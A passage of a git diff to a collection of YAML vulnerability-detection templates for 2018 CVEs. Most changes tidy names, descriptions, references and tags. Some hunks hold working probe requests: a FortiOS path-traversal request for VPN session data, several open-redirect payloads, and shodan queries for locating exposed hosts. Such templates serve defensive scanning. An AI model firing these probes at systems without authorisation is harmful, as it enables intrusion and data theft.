+    - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2018-11409
     cwe-id: CWE-200
-  tags: cve,cve2018,splunk
+  tags: edb,cve,cve2018,splunk
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml
index 6fe8e9f26f..75ba0bc4e5 100644
--- a/cves/2018/CVE-2018-11709.yaml
+++ b/cves/2018/CVE-2018-11709.yaml
@@ -1,13 +1,14 @@
 id: CVE-2018-11709
 
 info:
-  name: WordPress wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting
+  name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2018-11709
     - https://wordpress.org/plugins/wpforo/#developers
+    - https://wpvulndb.com/vulnerabilities/9090
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2018/CVE-2018-11759.yaml b/cves/2018/CVE-2018-11759.yaml
index 1e67c78e64..8aa02781f3 100644
--- a/cves/2018/CVE-2018-11759.yaml
+++ b/cves/2018/CVE-2018-11759.yaml
@@ -1,21 +1,25 @@
 id: CVE-2018-11759
 
 info:
-  name: Apache Tomcat JK Status Manager Access
+  name: Apache Tomcat JK Connect <=1.2.44 - Manager Access
   author: harshbothra_
   severity: high
-  description: The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge
-    cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy
-    that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd.
-    While there is some overlap between this issue and CVE-2018-1323, they are not identical.
+  description: |
+    Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.
   reference:
     - https://github.com/immunIT/CVE-2018-11759
+    - https://lists.apache.org/thread.html/6d564bb0ab73d6b3efdd1d6b1c075d1a2c84ecd84a4159d6122529ad@%3Cannounce.tomcat.apache.org%3E
+    - http://web.archive.org/web/20210518152646/https://www.securityfocus.com/bid/105888
+    - https://lists.debian.org/debian-lts-announce/2018/12/msg00007.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-11759
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-11759
     cwe-id: CWE-22
-  tags: cve,cve2018,apache,tomcat,status
+  metadata:
+    shodan-query: title:"Apache Tomcat"
+  tags: cve,cve2018,apache,tomcat
 
 requests:
   - method: GET
@@ -25,10 +29,12 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
 
       - type: word
         words:
           - "JK Status Manager"
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml
index 1202d3ee52..9e3b7f29e4 100644
--- a/cves/2018/CVE-2018-11776.yaml
+++ b/cves/2018/CVE-2018-11776.yaml
@@ -1,20 +1,22 @@
 id: CVE-2018-11776
 
 info:
-  name: Apache Struts2 S2-057 RCE
+  name: Apache Struts2 S2-057 - Remote Code Execution
   author: pikpikcu
   severity: high
-  description: 'Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then:
-    results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in
-    same time, its upper package have no or wildcard namespace.'
+  description: |
+    Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.
   reference:
     - https://github.com/jas502n/St2-057
+    - https://cwiki.apache.org/confluence/display/WW/S2-057
+    - https://security.netapp.com/advisory/ntap-20180822-0001/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-11776
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.1
     cve-id: CVE-2018-11776
     cwe-id: CWE-20
-  tags: cve,cve2018,apache,rce,struts
+  tags: cve,cve2018,apache,rce,struts,kev
 
 requests:
   - method: GET
@@ -31,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2018/CVE-2018-11784.yaml b/cves/2018/CVE-2018-11784.yaml
index ffd44dba23..32c6ca3011 100644
--- a/cves/2018/CVE-2018-11784.yaml
+++ b/cves/2018/CVE-2018-11784.yaml
@@ -8,22 +8,25 @@ info:
   reference:
     - https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E
     - https://nvd.nist.gov/vuln/detail/CVE-2018-11784
+    - http://web.archive.org/web/20210509082244/https://www.securityfocus.com/bid/105524
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
     cvss-score: 4.3
     cve-id: CVE-2018-11784
     cwe-id: CWE-601
+  metadata:
+    shodan-query: title:"Apache Tomcat"
   tags: tomcat,redirect,cve,cve2018,apache
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}//example.com"
+      - "{{BaseURL}}//interact.sh"
 
     matchers:
       - type: regex
         regex:
-          - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com"
+          - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?interact.sh"
         part: header
 
 # Enhanced by mp on 2022/04/26
diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml
index 4e98b1fb1d..64ec20de3a 100644
--- a/cves/2018/CVE-2018-12031.yaml
+++ b/cves/2018/CVE-2018-12031.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2018-12031
     cwe-id: CWE-22
-  tags: cve,cve2018,lfi
+  tags: edb,cve,cve2018,lfi
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-12054.yaml b/cves/2018/CVE-2018-12054.yaml
index 6624343c0d..596bee81e4 100644
--- a/cves/2018/CVE-2018-12054.yaml
+++ b/cves/2018/CVE-2018-12054.yaml
@@ -4,16 +4,18 @@ info:
   name: Schools Alert Management Script - Arbitrary File Read
   author: wisnupramoedya
   severity: high
-  description: "Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal."
+  description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.
   reference:
     - https://www.exploit-db.com/exploits/44874
     - https://nvd.nist.gov/vuln/detail/CVE-2018-12054
+    - https://github.com/unh3x/just4cve/issues/4
+    - https://www.exploit-db.com/exploits/44874/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-12054
     cwe-id: CWE-22
-  tags: cve,cve2018,lfi
+  tags: cve,cve2018,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-1207.yaml b/cves/2018/CVE-2018-1207.yaml
index 62b9881bd4..8a89ac6be8 100644
--- a/cves/2018/CVE-2018-1207.yaml
+++ b/cves/2018/CVE-2018-1207.yaml
@@ -12,6 +12,7 @@ info:
     - https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf
     - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py
     - https://nvd.nist.gov/vuln/detail/CVE-2018-1207
+    - http://en.community.dell.com/techcenter/extras/m/white_papers/20485410
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml
index cd09108f78..5f70dc983b 100644
--- a/cves/2018/CVE-2018-12095.yaml
+++ b/cves/2018/CVE-2018-12095.yaml
@@ -4,17 +4,18 @@ info:
   name: OEcms 3.1 - Cross-Site Scripting
   author: LogicalHunter
   severity: medium
-  description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.
+  description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.
   reference:
     - https://www.exploit-db.com/exploits/44895
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
     - https://cxsecurity.com/issue/WLB-2018060092
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-12095
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.4
     cve-id: CVE-2018-12095
     cwe-id: CWE-79
-  tags: cve,cve2018,xss
+  tags: cve,cve2018,xss,edb
 
 requests:
   - method: GET
@@ -36,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-12296.yaml b/cves/2018/CVE-2018-12296.yaml
index 02f94c31e4..71cbb2f3d7 100644
--- a/cves/2018/CVE-2018-12296.yaml
+++ b/cves/2018/CVE-2018-12296.yaml
@@ -4,7 +4,7 @@ info:
   name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure
   author: princechaddha
   severity: high
-  description: Insufficient access control in /api/external/7.0/system.System.get_infos in Seagate NAS OS version 4.3.15.1 allows attackers to obtain information about the NAS without authentication via empty POST requests.
+  description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos.
   reference:
     - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
     - https://nvd.nist.gov/vuln/detail/CVE-2018-12296
@@ -36,3 +36,5 @@ requests:
         group: 1
         regex:
           - '"version": "([0-9.]+)"'
+
+# Enhanced by mp on 2022/07/05
diff --git a/cves/2018/CVE-2018-12300.yaml b/cves/2018/CVE-2018-12300.yaml
index 53736ed55a..300570d436 100644
--- a/cves/2018/CVE-2018-12300.yaml
+++ b/cves/2018/CVE-2018-12300.yaml
@@ -9,7 +9,7 @@ info:
     - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
     - https://www.cvedetails.com/cve/CVE-2018-12300
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2018-12300
     cwe-id: CWE-601
@@ -19,10 +19,10 @@ requests:
   - method: GET
 
     path:
-      - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#'
+      - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2018/CVE-2018-12613.yaml b/cves/2018/CVE-2018-12613.yaml
index 32dcc6ca98..2391066bf6 100644
--- a/cves/2018/CVE-2018-12613.yaml
+++ b/cves/2018/CVE-2018-12613.yaml
@@ -1,20 +1,22 @@
 id: CVE-2018-12613
 
 info:
-  name: PhpMyAdmin 4.8.1 Remote File Inclusion
+  name: PhpMyAdmin <4.8.2 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages
-    are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify
-    any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
+  description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
   reference:
     - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
+    - https://www.phpmyadmin.net/security/PMASA-2018-4/
+    - https://www.exploit-db.com/exploits/44928/
+    - http://web.archive.org/web/20210124181726/https://www.securityfocus.com/bid/104532/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-12613
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2018-12613
     cwe-id: CWE-287
-  tags: cve,cve2018,phpmyadmin,lfi
+  tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi
 
 requests:
   - method: GET
@@ -32,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2018/CVE-2018-12634.yaml b/cves/2018/CVE-2018-12634.yaml
index edc2910da7..85573f2681 100644
--- a/cves/2018/CVE-2018-12634.yaml
+++ b/cves/2018/CVE-2018-12634.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://circontrol.com/
     - https://nvd.nist.gov/vuln/detail/CVE-2018-12634
+    - https://www.seebug.org/vuldb/ssvid-97353
+    - https://www.exploit-db.com/exploits/45384/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-12634
     cwe-id: CWE-200
-  tags: cve,cve2018,scada,circontrol,circarlife,logs
+  tags: cve,cve2018,scada,circontrol,circarlife,logs,edb
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-12675.yaml b/cves/2018/CVE-2018-12675.yaml
new file mode 100644
index 0000000000..b2311e0466
--- /dev/null
+++ b/cves/2018/CVE-2018-12675.yaml
@@ -0,0 +1,32 @@
+id: CVE-2018-12675
+
+info:
+  name: SV3C HD Camera L-SERIES - Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    The SV3C HD Camera (L-SERIES V2.3.4.2103-S50-NTD-B20170508B and V2.3.4.2103-S50-NTD-B20170823B) does not perform origin checks on URLs that the camera's web interface redirects a user to. This can be leveraged to send a user to an unexpected endpoint.
+  reference:
+    - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory
+    - https://vuldb.com/?id.125799
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-12675
+    - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-12675
+    cwe-id: CWE-601
+  metadata:
+    verified: "true"
+  tags: cve,cve2018,redirect,sv3c,camera,iot
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<META http-equiv="Refresh" content="0;URL=http://interact.sh">'
diff --git a/cves/2018/CVE-2018-1271.yaml b/cves/2018/CVE-2018-1271.yaml
index 1f85364ab7..7df75285eb 100644
--- a/cves/2018/CVE-2018-1271.yaml
+++ b/cves/2018/CVE-2018-1271.yaml
@@ -1,16 +1,18 @@
 id: CVE-2018-1271
 
 info:
-  name: Spring MVC Directory Traversal Vulnerability
+  name: Spring MVC Framework - Local File Inclusion
   author: hetroublemakr
   severity: medium
-  description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images).
-    When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory
-    traversal attack.
+  description: Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.
   reference:
     - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
+    - https://pivotal.io/security/cve-2018-1271
+    - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699
+    - https://access.redhat.com/errata/RHSA-2018:1320
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1271
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 5.9
     cve-id: CVE-2018-1271
     cwe-id: CWE-22
@@ -29,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2018/CVE-2018-1273.yaml b/cves/2018/CVE-2018-1273.yaml
index 657424e411..8b3a4dd942 100644
--- a/cves/2018/CVE-2018-1273.yaml
+++ b/cves/2018/CVE-2018-1273.yaml
@@ -13,12 +13,14 @@ info:
     or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2018-1273
+    - https://pivotal.io/security/cve-2018-1273
+    - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-1273
     cwe-id: CWE-20
-  tags: cve,cve2018,vmware,rce,spring
+  tags: cve,cve2018,vmware,rce,spring,kev
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml
index 59dc289d29..58fcddbf81 100644
--- a/cves/2018/CVE-2018-12998.yaml
+++ b/cves/2018/CVE-2018-12998.yaml
@@ -1,10 +1,10 @@
 id: CVE-2018-12998
 
 info:
-  name: Zoho manageengine Arbitrary Reflected XSS
+  name: Zoho manageengine - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.
+  description: Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts  Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.
   reference:
     - https://github.com/unh3x/just4cve/issues/10
     - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html
@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2018-12998
     cwe-id: CWE-79
-  tags: cve,cve2018,zoho,xss,manageengine
+  tags: cve,cve2018,zoho,xss,manageengine,packetstorm
 
 requests:
   - method: GET
@@ -37,3 +37,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml
index 4522abd071..59d3a5810f 100644
--- a/cves/2018/CVE-2018-1335.yaml
+++ b/cves/2018/CVE-2018-1335.yaml
@@ -1,19 +1,22 @@
 id: CVE-2018-1335
 
 info:
-  name: Apache Tika 1.15-1.17 Header Command Injection
+  name: Apache Tika <1.1.8-  Header Command Injection
   author: pikpikcu
   severity: high
-  description: From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This
-    vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18.
+  description: Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients.
   reference:
     - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
     - https://www.exploit-db.com/exploits/47208
+    - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E
+    - http://web.archive.org/web/20210516175956/https://www.securityfocus.com/bid/104001
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1335
+  remediation: Upgrade to Tika 1.18.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.1
     cve-id: CVE-2018-1335
-  tags: cve,cve2018,apache,tika,rce
+  tags: edb,cve,cve2018,apache,tika,rce
 
 requests:
   - method: PUT
@@ -45,3 +48,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/07
diff --git a/cves/2018/CVE-2018-13379.yaml b/cves/2018/CVE-2018-13379.yaml
index 3ad6d6e608..2b87621918 100644
--- a/cves/2018/CVE-2018-13379.yaml
+++ b/cves/2018/CVE-2018-13379.yaml
@@ -14,15 +14,19 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2018-13379
     cwe-id: CWE-22
-  tags: cve,cve2018,fortios
+  metadata:
+    verified: true
+    shodan-query: http.html:"/remote/login" "xxxxxxxx"
+  tags: cve,cve2018,fortios,lfi,kev
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
-    matchers:
-      - type: word
-        words:
-          - "var fgt_lang"
 
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '^var fgt_lang ='
 # Enhanced by mp on 2022/05/12
diff --git a/cves/2018/CVE-2018-13380.yaml b/cves/2018/CVE-2018-13380.yaml
index c2020b28fa..d40b209981 100644
--- a/cves/2018/CVE-2018-13380.yaml
+++ b/cves/2018/CVE-2018-13380.yaml
@@ -1,14 +1,15 @@
 id: CVE-2018-13380
 
 info:
-  name: Fortinet FortiOS Cross-Site Scripting
+  name: Fortinet FortiOS - Cross-Site Scripting
   author: shelld3v,AaronChen0
   severity: medium
-  description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized
-    malicious script code via the error or message handling parameters.
+  description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-13380
     - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
+    - https://fortiguard.com/advisory/FG-IR-18-383
+    - https://fortiguard.com/advisory/FG-IR-20-230
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-13380
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -40,3 +41,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-13980.yaml b/cves/2018/CVE-2018-13980.yaml
index 9d12a07112..c116c9f866 100644
--- a/cves/2018/CVE-2018-13980.yaml
+++ b/cves/2018/CVE-2018-13980.yaml
@@ -1,19 +1,21 @@
 id: CVE-2018-13980
 
 info:
-  name: Zeta Producer Desktop CMS 14.2.0 - Arbitrary File Retrieval
+  name: Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion
   author: wisnupramoedya
   severity: medium
-  description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
+  description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
   reference:
     - https://www.exploit-db.com/exploits/45016
+    - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/
+    - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html
     - https://nvd.nist.gov/vuln/detail/CVE-2018-13980
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 5.5
     cve-id: CVE-2018-13980
     cwe-id: CWE-22
-  tags: cve,cve2018,lfi
+  tags: cve,cve2018,lfi,edb,packetstorm
 
 requests:
   - method: GET
@@ -30,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml
index e0f1bf8f5f..4c0dc25d55 100644
--- a/cves/2018/CVE-2018-14013.yaml
+++ b/cves/2018/CVE-2018-14013.yaml
@@ -1,11 +1,14 @@
 id: CVE-2018-14013
 
 info:
-  name: Zimbra XSS
+  name: Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients.
+  description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.
   reference:
+    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
+    - https://bugzilla.zimbra.com/show_bug.cgi?id=109018
+    - https://bugzilla.zimbra.com/show_bug.cgi?id=109017
     - https://nvd.nist.gov/vuln/detail/CVE-2018-14013
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-14064.yaml b/cves/2018/CVE-2018-14064.yaml
index d8cf45f3a7..d981199492 100644
--- a/cves/2018/CVE-2018-14064.yaml
+++ b/cves/2018/CVE-2018-14064.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2018-14064
     cwe-id: CWE-22
-  tags: cve,cve2018,lfi,camera,iot
+  tags: edb,cve,cve2018,lfi,camera,iot
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-14474.yaml b/cves/2018/CVE-2018-14474.yaml
new file mode 100644
index 0000000000..65e39bbcda
--- /dev/null
+++ b/cves/2018/CVE-2018-14474.yaml
@@ -0,0 +1,32 @@
+id: CVE-2018-14474
+
+info:
+  name: OrangeForum 1.4.0 - Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup.
+  reference:
+    - https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa
+    - https://seclists.org/fulldisclosure/2019/Jan/32
+    - https://vuldb.com/?id.122045
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-14474
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-14474
+    cwe-id: CWE-601
